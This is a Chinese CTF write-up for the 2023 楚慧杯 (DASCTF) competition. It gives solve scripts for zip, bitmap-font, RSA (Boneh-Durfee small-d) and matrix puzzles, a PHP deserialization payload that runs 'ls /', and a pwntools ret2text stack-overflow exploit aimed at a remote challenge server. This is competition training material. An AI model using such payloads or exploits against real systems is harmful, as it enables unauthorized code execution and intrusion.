2023年楚慧杯(DASCTF)WP
怎么说呢,就是感觉比赛时间有点紧,3个小时15道题,然后还要结束前提交wp,就有点来不及,当时提交的wp还是匆匆一写。还有一个槽点就是这个比赛的时候不能看实时排名,只能依靠积分来盲猜,这多少有点难受(我们队有段时间积分掉到0.7我还以为要淘汰了。。。)
最后以一题之差屈居第二
MISC
ez_zip
用这个B神的脚本解套娃压缩包
import io
import zipfile
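# Peel a chain of nested zip archives held entirely in memory.
#
# Member names come from the archive and are therefore untrusted input: a name
# such as "../x" or an absolute path would make open() write outside the
# working directory. Only the final path component is used as the output name,
# and the script is best run from an empty scratch directory so that an
# extracted member cannot overwrite an existing file.
with open("ez_zip的附件.zip", "rb") as f:
    data = f.read()

# Collects the stem of every nested archive name, in the order they are opened.
info = "taptap"
while True:
    all_files_processed = True
    with zipfile.ZipFile(io.BytesIO(data), "r") as zf:
        for i in zf.filelist:
            if i.flag_bits & 0x800:
                # UTF-8 flag set: zipfile already decoded the name correctly,
                # and re-encoding it as cp437 could raise UnicodeEncodeError.
                fileName = i.filename
            else:
                # Legacy archives: zipfile decodes names as cp437; undo that
                # and decode the raw bytes as GBK instead.
                fileName = i.filename.encode("cp437").decode("gbk")

            # Decompress each member once instead of once per use.
            payload = zf.read(i)
            print(fileName)

            if zipfile.is_zipfile(io.BytesIO(payload)):
                # Another layer: continue with it on the next pass.
                data = payload
                all_files_processed = False
                info += f" {fileName.replace('.zip', '')}"
                continue

            # Keep only the last path component (both separator styles) so the
            # member cannot escape the current directory.
            safe_name = fileName.replace("\\", "/").rsplit("/", 1)[-1]
            if safe_name in ("", ".", ".."):
                # Directory entries and dot names have nothing to write.
                continue
            with open(safe_name, "wb") as out:
                out.write(payload)
    if all_files_processed:
        break
print(info)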
然后获得一个1.txt
加号改为1,-号改为0
二进制转ASCII获得flag
DASCTF{10c58258ccf1e7c631e5911ed6acc4ed}
gb2312-80
先写脚本用点阵数据画图
from PIL import Image
def draw(s, ind):
    """Render a bit string as a 16x16 image and save it as ``<ind>.png``.

    ``s`` is read as 256 characters in row-major order: character
    ``h * 16 + w`` colours pixel ``(w, h)``. A ``'0'`` becomes a black pixel,
    anything else a white one. Fewer than 256 characters raises IndexError.
    """
    bits = list(s)
    canvas = Image.new("RGB", (16, 16))
    black, white = (0, 0, 0), (255, 255, 255)
    for offset in range(16 * 16):
        # Row-major walk: offset -> (row, column).
        row, col = divmod(offset, 16)
        canvas.putpixel((col, row), black if bits[offset] == '0' else white)
    canvas.save(str(ind) + ".png")
def trans(s):
    """Turn a comma-separated list of integers into one long bit string.

    Each field is parsed as a decimal integer and written as binary,
    left-padded with zeros to at least 16 digits; the pieces are concatenated
    in input order.
    """
    rows = []
    for field in s.split(','):
        # bin() yields '0b...'; drop the prefix and pad to one 16-pixel row.
        rows.append(bin(int(field))[2:].zfill(16))
    return ''.join(rows)
# Draw one PNG per line of cipher.txt; the zero-based line number is the file name.
with open('cipher.txt', 'r') as cipher_file:
    index = 0
    for raw in cipher_file:
        draw(trans(raw.strip()), index)
        index += 1
根据画出的图片找到点阵数据与字符的对应关系,然后写脚本转换
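# Lookup table from one glyph (16 comma-separated row values, exactly as they
# appear on a line of cipher.txt) to the hex digit that glyph depicts.
# NOTE: the name is kept from the original listing; it shadows the builtin dir().
dir = {
    '0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0': '0',
    '0,0,128,896,384,384,384,384,384,384,384,384,384,960,0,0': '1',
    '0,0,960,1632,3120,3120,48,48,96,192,384,784,1552,4080,0,0': '2',
    '0,0,960,1632,3120,48,96,448,96,48,48,3120,1632,960,0,0': '3',
    '0,64,192,448,960,704,1728,3264,3264,6336,8176,192,192,480,0,0': '4',
    '0,0,4080,3072,3072,3072,4032,3680,48,48,48,3120,1632,960,0,0': '5',
    '0,0,960,1632,3120,3072,3520,3680,3120,3120,3120,3120,1632,960,0,0': '6',
    '0,0,4080,4080,2096,96,192,192,384,384,768,768,768,768,0,0': '7',
    '0,0,960,1632,3120,3120,1632,960,1632,3120,3120,3120,1632,960,0,0': '8',
    '0,0,960,1632,3120,3120,3120,3120,1648,1008,48,3120,1632,960,0,0': '9',
    '0,0,0,0,0,0,1984,3168,96,2016,3168,3168,2008,0,0,0': 'a',
    '0,0,3584,1536,1536,1536,2016,1560,1560,1560,1560,1560,3056,0,0,0': 'b',
    '0,0,0,0,0,0,992,3120,3072,3072,3072,3120,2016,0,0,0': 'c',
    '0,0,224,96,96,96,2016,3168,3168,3168,3168,3168,2000,0,0,0': 'd',
    '0,0,0,0,0,0,992,3120,3120,4080,3072,3120,2016,0,0,0': 'e',
    '0,0,240,408,384,384,2016,384,384,384,384,384,960,0,0,0': 'f',
}

# The context manager closes the file even when a line is not in the table
# (the lookup then raises KeyError, as before).
with open('cipher.txt', 'r') as f:
    for line in f:
        # strip() also removes a trailing '\r', so CRLF files still match the keys.
        line = line.strip()
        if not line:
            # A blank line carries no glyph.
            continue
        print(dir[line], end='')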
得到的数据解一下hex另存为zip,发现有个hint.txt,里面还有点阵
from PIL import Image
def draw(s,ind):
    """Save the 256-character bit string ``s`` as the 16x16 image ``<ind>.png``.

    Characters are consumed in row-major order; ``'0'`` paints a black pixel
    and any other character a white one. A string shorter than 256 characters
    raises IndexError.
    """
    cells = list(s)
    img = Image.new("RGB", (16, 16))
    for pos in range(256):
        # pos counts pixels row by row: column = pos % 16, row = pos // 16.
        shade = (0, 0, 0) if cells[pos] == '0' else (255, 255, 255)
        img.putpixel((pos % 16, pos // 16), shade)
    img.save(str(ind) + ".png")
# Glyph bitmaps taken from hint.txt (per the write-up): 14 lines, one glyph per
# line. Each line is split off below and passed to draw(), which reads it as a
# 16x16 bitmap flattened row by row ('0' = black pixel, anything else = white).
s = '''0000001000000000000000010000000001111111111111100100001000000010100010010010010000101000110010000100101100000100000011000001000001110111111100000000000100000000001000010000100000100001000010000010000100001000001000010000100000111111111110000010000000001000
0000100000010000111111111111100000010000000100000001000100010000001000010001000000100101000100000011111100010000011001010001010010100101111111100010010000000100001001000010010000100111111101000010010000000100001111000000010000100100000101000000000000001000
0000111111100000000010000010000000001000001000000000111111100000000010000010000000001000001000000000111111100000000000000000010011111111111111100000000100000000000010010010000000001001111100000000100100000000000101010000000000100011000001100100000011111100
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000011110000000000001111000000000000011000000000000000000000000000000110000000000000111100000000000011110000000000000110000000000000000000000000
0000000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000
0000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000
0000000000000000000000000000000000000011111000000000011000110000000011000001100000011000000011000001100000001100000110000000110000011000000011000001100000001100000110000000110000001100000110000000011000110000000000111110000000000000000000000000000000000000
0000000000000000000000000000000000111100000111000001100000001000000110000000100000011000000100000000110000010000000011000010000000001100001000000000011001000000000001100100000000000010100000000000001110000000000000010000000000000000000000000000000000000000
0000000000000000000000000000000000011111111110000000110000011000000011000000100000001100000000000000110000100000000011111110000000001100001000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000
0000000000000000000000000000000000011110001111000000110000011000000011000001100000001100000110000000110000011000000011111111100000001100000110000000110000011000000011000001100000001100000110000000110000011000000111100011110000000000000000000000000000000000
0000000000000000000000000000000000111111111110000010000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000010000011000000011000001111111111100000000000000000000000000000000000
0000000000000000000000000000000000011110011111000000110000110000000011000110000000001100110000000000110110000000000011111000000000001101110000000000110011100000000011000111000000001100001110000000110000011100000111100001111000000000000000000000000000000000
0000000000000000000000000000000000000000100000000000001110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000
0000000000000000000000000000000000000011110000000000011001100000000011000011000000001100000000000000110111000000000011100110000000001100001100000000110000110000000011000011000000001100001100000000011001100000000000111100000000000000000000000000000000000000'''
# One PNG per glyph line, numbered from 0 in the order the lines appear in s.
lt = s.split('\n')
for number, bitmap in enumerate(lt):
    draw(bitmap, number)
再转换一下,得到密码为ILOVEHZK16
DASCTF{842a99305a07e6183830582d1740c1b1}
CRYPTO
so-large-e
读取公钥e,n
from Crypto.PublicKey import RSA
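# Load the public key file and read the modulus n and public exponent e from it.
# (RSA.importKey is the legacy spelling; PyCryptodome also provides RSA.import_key.)
with open('pub.pem', 'r') as f:
    key = RSA.importKey(f.read())
n = key.n
e = key.e

# Ciphertext from the challenge. It is not used in this snippet; the literal is
# re-joined here from the digit groups that the listing had wrapped across lines.
c = int(
    "6838759631922176040297411386959306230064807618456930982742841698524"
    "6220168498072357260652721360436030271662490755600582326832301553466"
    "1442956651130997785781513800429881513791372966233753537127701985619"
    "3898546849896085411001528569293727010020290576888205244471943227253"
    "000727727343731590226737192613447347860"
)

# An e as long as n is the warning sign here: ordinary key generation fixes a
# small public exponent (commonly 65537), so a huge e suggests d was chosen small.
print('n=', n)
print('e=', e)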
n=
1165186793055152632908407067155796912139221692716345793275195629026
1354358262344960674154647292040199793004138855314190906948758946194
8798111698856100819163407893673249162209631978914843896272256274862
5014613210209619583670987591834871164174879226457826385108766097288
86007680825340200888068103951956139343723
e=
1134492478760713979112060700194959390881716967121827475021330631720
2156534578862726174095066589192265934002039722961932920452099909653
5909867327960323598168596664323692312516466648588320607291284630435
6822826307459476894319099984013895660819667534388697255836652943106
89820290368901166811028660086977458571233
e很大(与n同一量级),通常说明私钥d很小,可以使用Boneh–Durfee攻击
使用条件:d < N^0.292
修改delta
# from __future__ import print_function
# import time
#
# ############################################
# # Config
# ##########################################
#
# """
# Setting debug to true will display more informations
# about the lattice, the bounds, the vectors...
# """
# debug = True
#
# """
# Setting strict to true will stop the algorithm (and
# return (-1, -1)) if we don't have a correct
# upperbound on the determinant. Note that this
# doesn't necesseraly mean that no solutions
# will be found since the theoretical upperbound is
# usualy far away from actual results. That is why
# you should probably use `strict = False`
# """
# strict = False
#
# """
# This is experimental, but has provided remarkable results
# so far. It tries to reduce the lattice as much as it can
# while keeping its efficiency. I see no reason
from Crypto.Util.number import long_to_bytes
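# Challenge values. Each literal is re-joined from the digit groups that the
# listing had wrapped across several lines.
c = int(
    "6838759631922176040297411386959306230064807618456930982742841698524"
    "6220168498072357260652721360436030271662490755600582326832301553466"
    "1442956651130997785781513800429881513791372966233753537127701985619"
    "3898546849896085411001528569293727010020290576888205244471943227253"
    "000727727343731590226737192613447347860"
)
n = int(
    "1165186793055152632908407067155796912139221692716345793275195629026"
    "1354358262344960674154647292040199793004138855314190906948758946194"
    "8798111698856100819163407893673249162209631978914843896272256274862"
    "5014613210209619583670987591834871164174879226457826385108766097288"
    "86007680825340200888068103951956139343723"
)
# Public exponent; kept for reference, decryption below does not need it.
e = int(
    "1134492478760713979112060700194959390881716967121827475021330631720"
    "2156534578862726174095066589192265934002039722961932920452099909653"
    "5909867327960323598168596664323692312516466648588320607291284630435"
    "6822826307459476894319099984013895660819667534388697255836652943106"
    "89820290368901166811028660086977458571233"
)
# Private exponent recovered by the Boneh-Durfee step described in the write-up.
# It has 81 decimal digits against 309 for n (roughly n^0.26), which is inside
# the d < n^0.292 range that attack covers. Keys generated with a standard small
# e (such as 65537) yield a full-size d and are not exposed to it.
d = int(
    "6638223433976997289533369683177941184911459980322442665506941568300"
    "36498673227937"
)

# Textbook RSA decryption: m = c^d mod n, then integer -> bytes.
m = long_to_bytes(int(pow(c, d, n)))
print(m)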
matrixequation
直接上脚本
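# SageMath snippet. E, hint1, hint2 and hint3 are not defined here; per the
# write-up they are matrices filled in from the challenge's output file.
# NOTE(review): the derivation behind U, R and A is not shown on the page;
# the expressions are kept exactly as given.
U = hint2/hint1
R = (hint3/U/hint1/U/hint1/U/hint1/U/hint1).inverse()
A = U.inverse()*E-R

# 71 symbols; an entry of A is used as an index into this string. The single
# quote inside the literal must be escaped (the listing had lost the backslash,
# which made the line a syntax error).
alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()'
flag = ''
for k in range(24):
    # Every 5th cell of A, reading it row by row with 11 columns per row.
    i, j = 5*k // 11, 5*k % 11
    flag += alphabet[A[i, j]]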
E、hint1、hint2、hint3按照output中的数据填入即可
每11行是一个矩阵
WEB
eaaeval
发现提交这个用户密码可以跳转到另一个页面dhwiaoubfeuobgeobg.php
通过目录爆破可以得到www.zip
反序列化,需要绕过
O:4:"Flag":2:{s:1:"a";s:2:"ls";s:1:"b";s:1:"/";}
执行ls /,看看flag在哪
绕过限制查看flag.txt
PWN
ez_base
找到start函数然后找到我们的vuln函数
调试发现在sub 处存在栈溢出漏洞
通过字符表中的flag可以找到后门函数
那么接下来就是很简单的ret2text
```python
from pwn import *
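# p = process("./base")  # local run against the challenge binary
p = remote("tcp.cloud.dasctf.com", 23938)

# Menu and prompt strings are sent and matched as bytes, which is what
# pwntools expects on Python 3.
p.recvuntil(b"2:decode")
p.sendline(b"1")
p.recvuntil(b"cin de_str:")

# 0x28 bytes of padding, then the address the write-up identifies as the
# backdoor function. p64() returns bytes, so the padding must be a bytes
# literal too: str + bytes raises TypeError on Python 3.
# NOTE(review): a fixed return target like this presumably means the binary has
# no PIE and no stack canary on this path; confirm with checksec. Enabling both
# is the standard hardening against this bug class.
p.sendline(b"q" * 0x28 + p64(0x404911))
p.interactive()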